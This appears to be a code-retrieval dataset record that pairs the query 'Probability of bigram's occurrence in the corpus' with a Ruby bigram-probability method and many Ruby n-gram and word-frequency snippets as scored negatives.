"def prob_word_dist(arr)\n\tcounts = {}\n\t(0..arr[0].size-1).each do |i|\n\t\tcounts[i] = {}\n\tend\n\tarr.each do |word|\n\t\t(0..word.size-1).each do |i|\n\t\t\tif counts[i].has_key?(word[i]) then\n\t\t\t\tcounts[i][word[i]] += 1\n\t\t\telse\n\t\t\t\tcounts[i][word[i]] = 1\n\t\t\tend\n\t\tend\n\tend\n\tresult = []\n\t(0..arr.size-1).each do |i|\n\t\tcurr_word = \"\"\n\t\t(0..arr[0].size-1).each do |j|\n\t\t\ttemp_arr = []\n\t\t\tcounts[j].keys.each do |char|\n\t\t\t\t(1..counts[i][char]) do\n\t\t\t\t\ttemp_arr.push(char)\n\t\t\t\tend\n\t\t\tend\n\t\t\tcurr_word += temp_arr[random * temp_arr.size]\n\t\tend\n\t\tresult.add[curr_word]\n\tend",
"def dictionary\n @dictionary ||= ngrams.first.probabilities \n end",
"def qML(ngram)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n # get a bigram\n dgram = ngram[0..1]\n when 2\n # get a unigram\n dgram= ngram[0..0]\n end\n\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n return @counts.fetch(ngram, 0).to_f / @counts.fetch(dgram, 0).to_f\n else\n # if the denominator count would be zero, return 0\n if @word_count == 0 then return 0 end\n return @counts.fetch(ngram, 0).to_f / @word_count.to_f\n end\n\n rescue ZeroDivisionError\n 0\n end",
"def calculate_gt_probability next_ngram: nil, ngram_model: 0, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n next_ngram_rawcount = ngram_counts[local_ngram_model][next_ngram].to_i\n\n if next_ngram_rawcount == 0 # Distributing P*(unseen)\n return good_turing_bins[local_ngram_model][1].to_f/good_turing_bins[local_ngram_model][0] if @oov_counts.nil? # if no oov are set, we assign the whole probability mass to every missing token\n return (@leftover_probability[local_ngram_model]/@oov_counts[local_ngram_model].values.sum)*@oov_counts[local_ngram_model][next_ngram] # otherwise we assign only part of it\n else\n revised_counts = get_revised_counts next_ngram: next_ngram, ngram_model: local_ngram_model\n return revised_counts.to_f/good_turing_bins[local_ngram_model][0]\n end\n end",
"def sentence_commonality(sentence)\n probability_of_ngrams(common_ngrams_from_sentence(sentence))\n end",
"def most_frequent_bigram(str)\n bigram_count = Hash.new(0)\n\n # count each bigram appearance\n (0...str.length - 1).each do |i|\n bigram = str[i] + str[i+1]\n bigram_count[bigram] += 1\n end\n\n # return most frequent bigram\n bigram_count.max_by { |k, v| v }.first\nend",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def most_frequent_bigram(str)\n most_freq = \"\"\n highest_freq = 0\n bigram_hash = Hash.new(0)\n len = str.length\n (0...len-1).each { |idx| bigram_hash[str[idx..idx+1]] += 1 }\n bigram_hash.each do |k, v| \n if v > highest_freq\n most_freq = k \n highest_freq = v\n end\n end\n most_freq\nend",
"def word_prob(category, word)\n cat_freq = word_freq(category, word)\n non_cat_freq = word_freq(counter.keys, word) - cat_freq\n cat_docs = doc_size(category)\n non_cat_docs = doc_size(doc_counter.keys) - cat_docs\n\n cat_prob = [1.0 * cat_freq / cat_docs, 1.0].min\n non_cat_prob = [1.0 * non_cat_freq / non_cat_docs, 1.0].min\n\n if cat_prob == 0.0\n cond_prob = 0.4\n else\n cond_prob = 1.0 * cat_prob / (cat_prob + non_cat_prob)\n end\n\n # STDOUT.puts \"#{category}-#{word}, cat #{cat_prob}, non_cat #{non_cat_prob}, cond_p #{cond_prob}\"\n\n cond_prob = [[cond_prob, 0.99].min, 0.01].max\n end",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def text_commonality(text)\n probability_of_ngrams(common_ngrams_from_text(text))\n end",
"def most_frequent_bigram(str)\n count = Hash.new(0)\n\n (0...str.length - 1).each do |i|\n bigram = str[i..i + 1]\n\n count[bigram] += 1\n end\n\n count.sort_by { |k, v| v } [-1][0]\nend",
"def pML(ngram, discount=0)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n dgram = ngram[0..1]\n when 2\n dgram= ngram[0..0]\n end\n\n result = 0\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @counts.fetch(dgram, 0).to_f\n else\n if @word_count == 0 then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @word_count.to_f\n end\n\n# puts \"#{ngram.inspect} #{result}\"\n return result\n\n rescue ZeroDivisionError\n 0\n end",
"def word_prob(word, type)\n total_words_in_type = total_word_count_in_type(type)\n return total_words_in_type == 0 ? 0.0 : word_count(word, type).to_f / total_words_in_type\n end",
"def probability\n return @probability\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= p(tokens[i-2..i])\n end\n probability\n end",
"def most_frequent_bigram(str)\n counts = Hash.new(0)\n (0...str.length-1).each do |i|\n bigram = str[i..i + 1]\n counts[bigram] += 1\n end\n\n sorted = counts.sort_by { |h,v| v } # sorts by value \n sorted.last[0]\nend",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def word_frequency(text)\n norm_array = normalize(text).to_a\n freq = { }\n norm_array.each_with_object(Hash.new(0)){|key,hash| hash[key] += 1}\nend",
"def document_frequency\n @corpus.each_with_object({}) do |doc, df|\n doc.bag_of_words.keys.each do |word|\n df[word] = (df.fetch(word) { 0.0 }) + 1.0\n end\n end\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigram_hash[str[i..i+1]] += 1\n i += 1\n end\n\n bigram_hash.max_by {|k, v| v}[0]\nend",
"def calculate_match_probability\n # two heuristics: \n # 1 is are their multiple words in term_text? if so, mark as probable\n # if not, does it match the anchor regexp? if so, mark as probable\n # else, mark as improbable\n \n # multiple words?\n anchor_regexp = \"(featuring|plus|the|presents|with|plus|and|\\,|\\&|[()]|\\/|\\:|\\-|^|$)\"\n nix_regexp = \"parking|\\svs\\.?\\s\" \n if artist_name=~/#{nix_regexp}/i\n self.match_probability=\"unlikely\"\n return nil\n end\n text=term_text.strip\n if text[\" \"]\n self.match_probability=\"likely\"\n return \"multpl\"\n end\n if artist_name=~/#{anchor_regexp}\\s*#{text}\\s*#{anchor_regexp}/i\n self.match_probability=\"likely\"\n return \"regexp\"\n end\n# if artist_name=~/#{anchor_regexp}\\s+?#{text}\\s+?#{anchor_regexp}/i\n# match_probability=\"likely\"\n# return \"regexp\"\n# end\n self.match_probability=\"unlikely\"\n return nil\n end",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def probability_token_is_label(token, label, prob_label)\n token_count = token_count(token)\n prob_token = token_count / @doc_counts.values.reduce(:+).to_f\n return nil if prob_token == 0.0\n\n prob_token_in_label = probability_token_in_label(label, token)\n (prob_token_in_label * prob_label) / prob_token\n end",
"def probability var, val\n unless self.count.zero?\n self.count{|r| r[var] == val}.fdiv(self.count)\n else\n 0\n end\n end",
"def percent_of_word(word)\n @total_count = SubWordJoin.where(word: word).count\n puts @total_count\n sub_count = 0\n @sub = SubDriver.where(driver: self)\n @sub.each do |sub|\n sub_count += SubWordJoin.where(word: word, sub_driver: sub).count\n end\n\n percent = (sub_count.to_f/@total_count)*100\n return percent.round(2)\n\n end",
"def freq\n @freq ||= begin\n # calculate ngram counts for the haystack\n counts = Hash.new(0)\n veach(\"Haystack\", @haystack) do |element|\n element.ngrams.each do |ngram|\n counts[ngram] += 1\n end\n end\n\n # turn counts into inverse frequencies\n map = Hash.new(1)\n total = counts.values.inject(&:+).to_f\n counts.each do |ngram, count|\n map[ngram] = ((total / count) * 10).round\n end\n map\n end\n end",
"def word_freq(text)\n frequency = {}\n unique_words(text).each do |word|\n frequency[word] = 0\n end\n split_normalise(text).each do |word|\n frequency[word] += 1\n end\n frequency\nend",
"def calculate\n document_frequency.each_with_object({}) do |(word, freq), idf|\n idf[word] = Math.log(@corpus.size/freq)\n end\n end",
"def calculate_probability(useful_results, reroll_count)\n return 100.0 * useful_results / ( 6 ** reroll_count )\n end",
"def probability_of_class(classification)\n @number_of_documents_in_class[classification] / @number_of_documents.to_f\n end",
"def most_frequent_bigram(str)\n bigram = Hash.new(0)\n (0...str.length).each { |index| bigram[str[index..index+1]] += 1 }\n bigram.key(bigram.values.max)\nend",
"def contar(texto)\n palavras = texto.split\n\n frequencies = Hash.new(0)\n\n palavras.each do |word|\n frequencies [word] += 1\n end\n\n frequencies = frequencies.sort_by do |wor, count|\n end\n frequencies.reverse!\n\n frequencies.each do |wor, count|\n puts wor + \" \" + count.to_s\n end\nend",
"def test_approach\n prefix = \"This pangram tallies \"\n solution = \"This pangram tallies five a's, one b, one c, two d's, twenty-eight e's, eight f's, six g's, eight h's, thirteen i's, one j, one k, three l's, two m's, eighteen n's, fifteen o's, two p's, one q, seven r's, twenty-five s's, twenty-two t's, four u's, four v's, nine w's, two x's, four y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n\n prefix = \"This terribly inefficient pangram contains \"\n solution = \"This terribly inefficient pangram contains five a's, two b's, three c's, two d's, thirty-one e's, six f's, four g's, ten h's, sixteen i's, one j, one k, three l's, two m's, twenty n's, thirteen o's, two p's, one q, twelve r's, twenty-eight s's, twenty-eight t's, three u's, three v's, nine w's, four x's, six y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n end",
"def gramos\r\n grams = 0\r\n @lista_alimentos.each do |i|\r\n grams += 100\r\n end\r\n return grams\r\n end",
"def frequency\n counts = Hash.new(0)\n self.words.each { |word| counts[word] += 1 }\n counts\n end",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def score(sentence)\n total_scores = 0\n rep_array = @sent_rep_compiler.compile(sentence)\n rep_array.each { |word| total_scores += @wts_scores_obj[word.id] }\n total_scores / rep_array.length\n end",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def english?(text)\n num_english = 0\n text_words = text.split(\" \")\n text_words.each do |text_word|\n WORDS_BY_FREQUENCY.each do |dict_word|\n if text_word == dict_word.upcase\n num_english += 1\n break\n end\n end\n end\n return num_english.to_f / text_words.length > 0.75\nend",
"def score\n @score ||= phonetic_levenshtein_distance + penalties\n end",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def most_frequent_bigram(str)\n#grab substrings of length 2\n#hash that contains the substring\n#return key with max value \n\n bigrams = Hash.new(0)\n str.each_char.with_index do |char, i|\n bigrams[str[i..i+1]] += 1 if i + 1 < str.length\n end\n bigrams.max_by { |k,v| v }.first\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n\n str.each_char.with_index do |char, i|\n if i != str.length - 1\n bigram = char + str[i + 1]\n end\n hash[bigram] += 1\n end\n most_frequent = hash.values.max\n hash.each { |k, v| return k if v == most_frequent}\n\nend",
"def frequency(text)\n text = text.downcase.gsub(/\\s*/, '')\n chars = text.split('')\n freqs = Hash[('a'..'z').to_a.zip([0] * 26)]\n\n chars.each { |c| freqs[c] += 1 }\n\n freqs\n end",
"def most_frequent_bigram(str)\n most_frequent_bigram = Hash.new(0)\n\n str.each_char.with_index do |char, index|\n bigram = \"#{char}#{str[index + 1]}\"\n most_frequent_bigram[bigram] += 1\n end\n\n max_count = most_frequent_bigram.sort_by {|k, v| v}\n max_count[-1][0]\nend",
"def fragment_commonality(fragment)\n probability_of_ngrams(common_ngrams_from_fragment(fragment))\n end",
"def grams\n gram_equivalent / amount\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index {|c, i| hash[c + str[i+1]] += 1 if str[i + 1]}\n hash.key(hash.values.max)\nend",
"def term_frequency(document, term)\n tf = document.term_count(term)\n if @function == :bm25\n (tf * 2.2) / (tf + 0.3 + 0.9 * documents.size / @model.average_document_size)\n else\n sqrt(tf)\n end\n end",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def get_sentence_progresses\n if @all_sentence_count > 0\n @progress_sentence_ch = 100 * @memorized_sentence_count_ch / @all_sentence_count\n @progress_sentence_ja = 100 * @memorized_sentence_count_ja / @all_sentence_count\n else\n @progress_sentence_ch = 0\n @progress_sentence_ja = 0\n end\n end",
"def probabilities_for(ngrams)\n table = {}\n\n ngrams.each do |ngram|\n table[ngram] = probability_of_ngram(ngram)\n end\n\n return table\n end",
"def popularity_boost\n return 0 if word_datas.empty?\n\n rare_words = word_datas.select { |data| data[:rarity] }\n return 0 if rare_words.empty?\n\n # 0-1 score for popularity\n # Then divide it by 0-1 for word length\n boosts = rare_words.map do |word|\n 1 - Math.log(word[:rarity] + 1, 60_000)\n end\n boosts.reduce(0, &:+)\n end",
"def has_gram?(gram)\n @frequencies.has_key?(gram)\n end",
"def score_freq(cs)\n \" eta\".each_char.map { |c| cs.index(c) || 9999 }.reduce(&:+)\nend",
"def percentages\n @_percentages ||= words.each_with_object({}) do |word_count, hash|\n hash[word_count.first] = percentage(word_count.last)\n end\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n key = char + str[idx + 1] if idx < str.length - 1\n hash[key] += 1\n end\n\n hash.key(hash.values.max)\nend",
"def score_title title, freq_list\n title\n .split\n .map{|word| is_initialism(word) ? 4 : score_for_frequency(freq_list[sanitize word])}\n .inject(:+)\n end",
"def phonetic_coverage\n 1 - phones_in_word_list/@initial_phones.to_f\n end",
"def count(gram)\n @dirty = true\n\n unless @frequencies.has_key?(gram)\n @frequencies[gram] = 0\n end\n\n return @frequencies[gram] += 1\n end",
"def most_frequent_bigram(str)\n counter = Hash.new(0)\n (0...str.length-1).each { |i| counter[str[i] + str[i+1]] += 1 }\n sorted = counter.sort_by { |k, v| v }\n sorted[-1][0]\nend"
] | [
"0.73970234",
"0.70978487",
"0.6869366",
"0.68479264",
"0.68038917",
"0.6757227",
"0.6729877",
"0.6543553",
"0.64418244",
"0.6419717",
"0.6325295",
"0.63038254",
"0.62904406",
"0.62812465",
"0.62567854",
"0.62363577",
"0.62209475",
"0.6212022",
"0.62085927",
"0.6198233",
"0.6188971",
"0.61854017",
"0.6178421",
"0.61348134",
"0.6121978",
"0.6111741",
"0.6073402",
"0.6071395",
"0.60710406",
"0.6024717",
"0.5990377",
"0.5990095",
"0.59848964",
"0.594559",
"0.5936904",
"0.5930776",
"0.59094816",
"0.589197",
"0.5874413",
"0.58641505",
"0.5857109",
"0.5852107",
"0.5848248",
"0.5841763",
"0.58180803",
"0.58155346",
"0.5814226",
"0.5809941",
"0.58047205",
"0.5796977",
"0.578404",
"0.5783301",
"0.577499",
"0.57727563",
"0.5769943",
"0.5766564",
"0.57592744",
"0.5750287",
"0.5750269",
"0.57475096",
"0.57460743",
"0.5720607",
"0.571913",
"0.5708175",
"0.5697505",
"0.5680021",
"0.5679883",
"0.567592",
"0.567302",
"0.5669892",
"0.5669096",
"0.56497025",
"0.56450146",
"0.5630032",
"0.56216925",
"0.5618389",
"0.5617837",
"0.56172067",
"0.55966276",
"0.55929476",
"0.5587389",
"0.55819714",
"0.55800414",
"0.5577533",
"0.55715036",
"0.5570117",
"0.5560356",
"0.5555435",
"0.5552366",
"0.5550079",
"0.55496424",
"0.55377394",
"0.55352867",
"0.5533176",
"0.55292755",
"0.55235726",
"0.5521859",
"0.5518092",
"0.551356",
"0.55128646"
] | 0.7525785 | 0 |
Probability of bigram's occurrence in the corpus. | def file_probability(word1, word2=nil)
bigram = (Bigram === word1 ? word1 : get(word1, word2))
BigDecimal.new(bigram.files.size) / analysis.files.size
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def probability(word1, word2=nil)\n bigram = (Bigram === word1 ? word1 : get(word1, word2))\n BigDecimal.new(bigram.count) / total #size\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def probability_of(gram)\n @probabilities.fetch(gram,0.0)\n end",
"def text_probability(text)\n probability_of_ngrams(ngrams_from_text(text))\n end",
"def calculate_probability(word)\n ham_word_frequency = 2 * words_hash[[word,:good]]\n spam_word_frequency = words_hash[[word, :bad]]\n return if ham_word_frequency + spam_word_frequency < 5\n word_probability = min(1.0, spam_word_frequency.to_f / spam_count)\n total_probability = word_probability + min(1.0, ham_word_frequency.to_f / ham_count)\n max(0.1, min(0.99, word_probability/total_probability))\n end",
"def probability(word)\n word = (Word === word ? word : get(word))\n BigDecimal.new(word.count) / total\n end",
"def sentence_probability(sentence)\n probability_of_ngrams(ngrams_from_sentence(sentence))\n end",
"def calculate_probabilities\n @words_hash.keys.each do |word, _|\n @probability_hash[word] = calculate_probability(word)\n end\n end",
"def fragment_probability(fragment)\n probability_of_ngrams(ngrams_from_fragment(fragment))\n end",
"def spamicity(message)\n words = message.split(/\\W+/).map { |m| m.downcase}\n intersting_words_probability_list = intersting_words(words)\n intersting_words_product = intersting_words_probability_list.inject(:*)\n total_probability = intersting_words_product + intersting_words_probability_list.map { |x| 1 - x }.inject(:*)\n intersting_words_product / total_probability\n end",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 
